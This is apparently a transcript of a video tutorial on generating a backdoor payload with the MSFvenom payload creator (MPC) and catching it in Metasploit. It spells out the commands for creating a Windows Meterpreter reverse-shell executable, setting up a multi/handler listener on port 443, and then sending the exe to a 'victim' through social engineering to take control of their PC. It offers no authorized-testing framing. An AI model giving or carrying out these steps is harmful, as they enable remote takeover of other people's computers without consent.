Welcome. In this video we are going to learn hack remote Windows or Linux PC using MPC tool. MSF Venom payload creator, that is MPC, is a wrapper to generate multiple types of payloads based on user's choice. The idea is to be as simple as possible to produce their payload. Fully automating MSF Venom and Metasploit is the end goal. The rest is to make users' life as easy as possible. The only necessary input from the user should be defining the payload they want by either the platform or the file extension. If you don't remember your IP for interface, then don't worry, just use the interface name ETH0. And if you don't know what your external IP is, MPC will discover it, that is WAN. Want to generate one of each payload? No issue, try loop. Want to mass create payloads? Everything, or to filter your select? Either way, it's not a problem. Let's open up terminal, download latest MPC tool from GitHub, type cd desktop and git clone, and the URL, that is github.com mi1kmpc.git, and hit enter. Here you can see that download is started. Type cd mpc and type ls. Here you can see that MPC directory files. Let's change file permission. Type 777 space msfpc.sh. Execute msfpc file type ./msfpc. Here you can see that module information and some of the basic examples. Type apk, asp, aspx and so on. Let's create backdoor for Windows PC. Type .msfpc.sh Windows 192.168.1.103. Here you can see that it will automatically create Windows Meterpreter exe and save in your MPC folder. Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Let's open up MSF console, load handler module. Type use exploit /multi/handler. Set payload as reverse TCP. Type set payload Windows /meterpreter /reverse_TCP. Set lhost as 192.168.1.103. Type show option. Here you can see that L port is 444. Now change the port address. Type set L port as 443. Exploit. Now send our exe files to the victim using any social engineering technique. Now when the victim will use exe, you will get the meterpreter of victim PC. So that's it in this video on hack remote Windows or Linux PC using MPC in Metasploit. Thank you for watching this video.